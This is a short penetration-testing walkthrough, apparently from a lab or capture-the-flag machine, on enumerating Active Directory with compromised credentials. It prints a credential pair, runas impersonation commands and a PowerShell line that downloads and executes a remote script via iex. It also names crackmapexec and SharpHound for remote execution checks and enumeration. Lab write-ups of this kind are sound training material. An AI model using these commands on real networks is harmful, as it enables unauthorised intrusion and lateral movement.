Enumerate Active Directory(AD) remotely with any valid user account credentials.(runas and PsExec), Lateral movement
Method 1(Requires Windows machine):
Prerequisite: Credentials for at least one account which you compromised.(support:#00^BlackKnight) in this demo example.
Okay lets check whether we can get RCE via smb or via winrm using crackmapexec.
If you are allowed to run commands remotely crackmapexec will show pwned!. Now in this case when you are exhausted enumerating LDAP,SMB,kerberos etc. but didnβt found something interesting. We can impersonate as a valid AD user using runas command in windows.
runas /netonly /user:BLACKFIELD.local\support powershell
runas /netonly /user:<FQDN>\<username> powershell
Then we can run
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
$dC=<DC IP>
Get-ADDomain -Server $dC
Then we can run sharphound remotely to query AD infomation